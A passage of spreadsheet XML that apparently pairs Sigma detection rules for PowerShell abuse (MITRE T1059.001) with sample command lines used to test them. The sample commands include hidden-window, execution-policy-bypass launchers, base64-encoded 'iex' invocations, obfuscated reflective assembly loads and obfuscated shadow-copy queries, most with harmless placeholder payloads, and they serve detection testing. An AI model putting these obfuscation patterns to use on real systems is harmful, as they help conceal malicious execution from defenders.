          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2543" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2543" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2543" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --headless pwsh -c "Write-Host 'Bypassed'"</t>
        </is>
      </c>
      <c r="F2543" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2543" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2543" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2543" s="43" t="n"/>
      <c r="J2543" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2543" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2544" ht="15.75" customHeight="1" s="42">
      <c r="A2544" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2544" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2544" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2544" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2544" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --headless powershell -ExecutionPolicy Bypass -Command "Write-Host 'Bypassed'"</t>
        </is>
      </c>
      <c r="F2544" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2544" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2544" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2544" s="43" t="n"/>
      <c r="J2544" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2544" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2545" ht="15.75" customHeight="1" s="42">
      <c r="A2545" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2545" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C2545" s="43" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D2545" s="43" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E2545" s="43" t="inlineStr">
        <is>
          <t>conhost.exe --headless powershell.exe -Command Write-Host 'Bypassed'</t>
        </is>
      </c>
      <c r="F2545" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2545" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2545" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2545" s="43" t="n"/>
      <c r="J2545" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2545" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2546" ht="15.75" customHeight="1" s="42">
      <c r="A2546" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2546" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C2546" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D2546" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E2546" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -WindowStyle Hidden -Command "iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('...')))"</t>
        </is>
      </c>
      <c r="F2546" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2546" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2546" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2546" s="43" t="n"/>
      <c r="J2546" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2546" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2547" ht="15.75" customHeight="1" s="42">
      <c r="A2547" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2547" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C2547" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D2547" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E2547" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('cwB2ACAAbwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACkAOwBzAHYAIABkACAA')) | iex"</t>
        </is>
      </c>
      <c r="F2547" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2547" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2547" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2547" s="43" t="n"/>
      <c r="J2547" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2547" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2548" ht="15.75" customHeight="1" s="42">
      <c r="A2548" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2548" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_covenant</t>
        </is>
      </c>
      <c r="C2548" s="43" t="inlineStr">
        <is>
          <t>HackTool - Covenant PowerShell Launcher</t>
        </is>
      </c>
      <c r="D2548" s="43" t="inlineStr">
        <is>
          <t>c260b6db-48ba-4b4a-a76f-2f67644e99d2</t>
        </is>
      </c>
      <c r="E2548" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('...')) | iex"</t>
        </is>
      </c>
      <c r="F2548" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2548" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2548" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2548" s="43" t="n"/>
      <c r="J2548" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2548" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2549" ht="15.75" customHeight="1" s="42">
      <c r="A2549" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2549" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C2549" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D2549" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E2549" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$p = $env:Public; $char1 = $p[13]; $char2 = $p[5]; $exec = $char1 + $char2 + 'y'; Invoke-Expression $exec"</t>
        </is>
      </c>
      <c r="F2549" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2549" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2549" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2549" s="43" t="n"/>
      <c r="J2549" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2549" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2550" ht="15.75" customHeight="1" s="42">
      <c r="A2550" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2550" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C2550" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D2550" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E2550" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABzID0gJ2pvaW4lMjZzcGxp dCcgOyBXcml0ZS1Ib3N0ICRz</t>
        </is>
      </c>
      <c r="F2550" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2550" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2550" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2550" s="43" t="n"/>
      <c r="J2550" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2550" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2551" ht="15.75" customHeight="1" s="42">
      <c r="A2551" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2551" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_crackmapexec_powershell_obfuscation</t>
        </is>
      </c>
      <c r="C2551" s="43" t="inlineStr">
        <is>
          <t>HackTool - CrackMapExec PowerShell Obfuscation</t>
        </is>
      </c>
      <c r="D2551" s="43" t="inlineStr">
        <is>
          <t>6f8b3439-a203-45dc-a88b-abf57ea15ccf</t>
        </is>
      </c>
      <c r="E2551" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[char[]](106,111,105,110) -join '' + ' ' + [char[]](115,112,108,105,116) -join ''"</t>
        </is>
      </c>
      <c r="F2551" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2551" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2551" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2551" s="43" t="n"/>
      <c r="J2551" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2551" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2552" ht="15.75" customHeight="1" s="42">
      <c r="A2552" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2552" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C2552" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D2552" s="43" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E2552" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgLWVjaG8=')))"</t>
        </is>
      </c>
      <c r="F2552" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2552" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2552" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2552" s="43" t="n"/>
      <c r="J2552" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2552" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2553" ht="15.75" customHeight="1" s="42">
      <c r="A2553" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2553" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C2553" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D2553" s="43" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E2553" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -enc SQBgAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAiAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEIAeQBwAGEAcwBzACAAVABlAHMAdAAnACIA</t>
        </is>
      </c>
      <c r="F2553" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2553" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2553" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2553" s="43" t="n"/>
      <c r="J2553" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2553" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2554" ht="15.75" customHeight="1" s="42">
      <c r="A2554" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2554" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_invoke</t>
        </is>
      </c>
      <c r="C2554" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword</t>
        </is>
      </c>
      <c r="D2554" s="43" t="inlineStr">
        <is>
          <t>6385697e-9f1b-40bd-8817-f4a91f40508e</t>
        </is>
      </c>
      <c r="E2554" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -e SQBgAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAiAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAxACIAAA==</t>
        </is>
      </c>
      <c r="F2554" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2554" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2554" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2554" s="43" t="n"/>
      <c r="J2554" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2554" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2555" ht="15.75" customHeight="1" s="42">
      <c r="A2555" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2555" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C2555" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D2555" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E2555" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA==</t>
        </is>
      </c>
      <c r="F2555" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2555" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2555" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2555" s="43" t="n"/>
      <c r="J2555" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2555" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2556" ht="15.75" customHeight="1" s="42">
      <c r="A2556" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2556" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C2556" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D2556" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E2556" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand IAAoAFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAC4ASQBuAHYAbwBrAGUAKAAkAGIAeQB0AGUAcwApACkAcwA=</t>
        </is>
      </c>
      <c r="F2556" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2556" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2556" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2556" s="43" t="n"/>
      <c r="J2556" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2556" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2557" ht="15.75" customHeight="1" s="42">
      <c r="A2557" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2557" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C2557" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D2557" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E2557" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { [System.Reflection.Assembly]::Load([Convert]::FromBase64String('WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA==')) }"</t>
        </is>
      </c>
      <c r="F2557" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2557" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2557" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2557" s="43" t="n"/>
      <c r="J2557" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2557" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2558" ht="15.75" customHeight="1" s="42">
      <c r="A2558" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2558" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load</t>
        </is>
      </c>
      <c r="C2558" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Reflective Assembly Load</t>
        </is>
      </c>
      <c r="D2558" s="43" t="inlineStr">
        <is>
          <t>62b7ccc9-23b4-471e-aa15-6da3663c4d59</t>
        </is>
      </c>
      <c r="E2558" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA==')) }"</t>
        </is>
      </c>
      <c r="F2558" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2558" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2558" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2558" s="43" t="n"/>
      <c r="J2558" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2558" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2559" ht="15.75" customHeight="1" s="42">
      <c r="A2559" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2559" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C2559" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D2559" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E2559" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::( [char]76 + [char]111 + [char]97 + [char]100 ).Invoke($data)"</t>
        </is>
      </c>
      <c r="F2559" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2559" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2559" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2559" s="43" t="n"/>
      <c r="J2559" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2559" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2560" ht="15.75" customHeight="1" s="42">
      <c r="A2560" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2560" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C2560" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D2560" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E2560" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::( [string]::Concat('L','o','a','d') ).Invoke($data)"</t>
        </is>
      </c>
      <c r="F2560" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2560" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2560" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2560" s="43" t="n"/>
      <c r="J2560" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2560" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2561" ht="15.75" customHeight="1" s="42">
      <c r="A2561" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2561" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C2561" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D2561" s="43" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E2561" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::( 'L' + 'oad' ).Invoke($data)"</t>
        </is>
      </c>
      <c r="F2561" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2561" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2561" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2561" s="43" t="n"/>
      <c r="J2561" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2561" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2562" ht="15.75" customHeight="1" s="42">
      <c r="A2562" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2562" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C2562" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D2562" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E2562" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-CimInstance -ClassName 'Win32_ShadowCopy'"</t>
        </is>
      </c>
      <c r="F2562" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2562" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2562" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2562" s="43" t="n"/>
      <c r="J2562" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2562" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2563" ht="15.75" customHeight="1" s="42">
      <c r="A2563" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2563" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C2563" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D2563" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E2563" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-CimInstance -ClassName ("Win32" + "_" + "ShadowCopy")"</t>
        </is>
      </c>
      <c r="F2563" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2563" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2563" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2563" s="43" t="n"/>
      <c r="J2563" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2563" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2564" ht="15.75" customHeight="1" s="42">
      <c r="A2564" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2564" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C2564" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D2564" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E2564" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-CimInstance -ClassName ("Win32_" + 'ShadowCopy')"</t>
        </is>
      </c>
      <c r="F2564" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2564" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2564" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2564" s="43" t="n"/>
      <c r="J2564" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2564" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2565" ht="15.75" customHeight="1" s="42">
      <c r="A2565" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2565" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C2565" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D2565" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E2565" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-CimInstance -ClassName ([char]87+[char]105+[char]110+[char]51+[char]50+[char]95+[char]83+[char]104+[char]97+[char]100+[char]111+[char]119+[char]67+[char]111+[char]112+[char]121)"</t>
        </is>
      </c>
      <c r="F2565" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2565" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2565" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2565" s="43" t="n"/>
      <c r="J2565" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2565" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2566" ht="15.75" customHeight="1" s="42">
      <c r="A2566" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2566" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C2566" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D2566" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E2566" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-CimInstance -ClassName ("Win32_" + [char]83 + [char]104 + [char]97 + [char]100 + [char]111 + [char]119 + [char]67 + [char]111 + [char]112 + [char]121)"</t>
        </is>
      </c>
      <c r="F2566" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2566" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2566" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2566" s="43" t="n"/>
      <c r="J2566" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2566" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2567" ht="15.75" customHeight="1" s="42">
      <c r="A2567" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2567" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C2567" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D2567" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E2567" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-CimInstance -ClassName ("Win32_" + [System.Text.Encoding]::UTF8.GetString([System.Text.Encoding]::UTF8.GetBytes('ShadowCopy')))"</t>
        </is>
      </c>
      <c r="F2567" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2567" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2567" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2567" s="43" t="n"/>
      <c r="J2567" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2567" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2568" ht="15.75" customHeight="1" s="42">
      <c r="A2568" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B2568" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C2568" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D2568" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E2568" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-CimInstance -ClassName ("Win32_" + [System.String]::Concat('Shadow','Copy'))"</t>
        </is>
      </c>
      <c r="F2568" s="43" t="b">
